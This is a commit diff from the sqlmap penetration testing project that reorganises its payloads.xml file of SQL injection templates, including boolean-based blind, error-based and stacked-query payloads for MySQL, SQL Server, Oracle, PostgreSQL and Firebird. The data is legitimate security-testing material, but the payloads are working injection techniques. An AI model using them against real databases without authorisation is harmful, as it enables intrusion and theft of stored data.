sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-16 19:40:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Major improvements

Browse Source
This commit is contained in:
Bernardo Damele 2010-12-04 16:40:08 +00:00
parent 9e5f933ace
commit 2612615978
1 changed files with 217 additions and 194 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

411
xml/payloads.xml
View File

@ -413,7 +413,7 @@ Formats:
<test>
<title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype>
<level>4</level>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
@ -428,7 +428,7 @@ Formats:
<test>
<title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype>
<level>4</level>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>1</where>
@ -447,7 +447,7 @@ Formats:
<test>
<title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype>
<level>4</level>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>1</where>
@ -462,11 +462,109 @@ Formats:
<!-- End of boolean-based blind tests - WHERE clause -->
<!-- Boolean-based blind tests - Parameter replace -->
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
<!-- NOTE: this does not behave as expected against SQLite -->
<test>
<title>Generic boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
</response>
</test>
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Oracle boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
<!-- NOTE: this does not behave as expected against SQLite -->
<test>
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
@ -482,7 +580,7 @@ Formats:
</test>
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
<title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
@ -502,7 +600,7 @@ Formats:
</test>
<test>
<title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
<title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
@ -521,7 +619,7 @@ Formats:
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (append)</title>
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
@ -540,7 +638,7 @@ Formats:
</test>
<test>
<title>Oracle boolean-based blind - ORDER BY clause (append)</title>
<title>Oracle boolean-based blind - ORDER BY clause</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
@ -558,102 +656,6 @@ Formats:
</details>
</test>
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (replace)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Oracle boolean-based blind - ORDER BY clause (replace)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
<!-- NOTE: this does not behave as expected against SQLite -->
<test>
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
</response>
</test>
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
<!-- Error-based tests - WHERE clause -->
<test>
@ -736,11 +738,11 @@ Formats:
<test>
<title>Firebird error-based - WHERE clause (AND)</title>
<stype>2</stype>
<level>1</level>
<level>2</level>
<risk>0</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]')</vector>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')</vector>
<request>
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
@ -832,11 +834,11 @@ Formats:
<test>
<title>Firebird error-based - WHERE clause (OR)</title>
<stype>2</stype>
<level>2</level>
<level>3</level>
<risk>2</risk>
<clause>1</clause>
<where>1</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]')</vector>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')</vector>
<request>
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
@ -854,9 +856,108 @@ Formats:
<!-- End of error-based tests - WHERE clause -->
<!-- Error-based tests - Parameter replace -->
<test>
<title>MySQL &gt;= 5.0 error-based - Parameter replace</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector>
<request>
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL error-based - Parameter replace</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
<clause>3</clause>
<where>3</where>
<vector>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</vector>
<request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Oracle error-based - Parameter replace</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Firebird error-based - WHERE clause (OR)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]'))</vector>
<request>
<payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Firebird</dbms>
</details>
</test>
<!-- End of error-based tests - Parameter replace -->
<!-- Error-based tests - GROUP BY and ORDER BY clauses -->
<test>
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (append)</title>
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
@ -876,7 +977,7 @@ Formats:
</test>
<test>
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (append)</title>
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
@ -895,7 +996,7 @@ Formats:
</test>
<test>
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (append)</title>
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
@ -914,7 +1015,7 @@ Formats:
</test>
<test>
<title>Oracle error-based - ORDER BY clause (append)</title>
<title>Oracle error-based - ORDER BY clause</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
@ -931,83 +1032,6 @@ Formats:
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (replace)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector>
<request>
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>2,3</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>3</clause>
<where>3</where>
<vector>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</vector>
<request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Oracle error-based - ORDER BY clause (replace)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>3</clause>
<where>3</where>
<vector>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<!--
TODO: if possible, add payload for SQLite, Microsoft Access
and SAP MaxDB - no known techniques at this time
@ -1141,7 +1165,7 @@ Formats:
</test>
<test>
<title>Oracle stacked queries</title>
<title>Oracle stacked queries - BEGIN DBMS_LOCK.SLEEP technique</title>
<stype>4</stype>
<level>3</level>
<risk>0</risk>
@ -1160,9 +1184,9 @@ Formats:
</test>
<test>
<title>Oracle stacked queries</title>
<title>Oracle stacked queries - EXEC DBMS_LOCK.SLEEP technique</title>
<stype>4</stype>
<level>5</level>
<level>4</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
@ -1179,7 +1203,7 @@ Formats:
</test>
<test>
<title>Oracle stacked queries</title>
<title>Oracle stacked queries - BEGIN USER_LOCK.SLEEP technique</title>
<stype>4</stype>
<level>5</level>
<risk>0</risk>
@ -1218,7 +1242,6 @@ Formats:
</test>
<test>
<!-- TODO: works only on Firebird >= 3.0? -->
<title>Firebird stacked queries</title>
<stype>4</stype>
<level>3</level>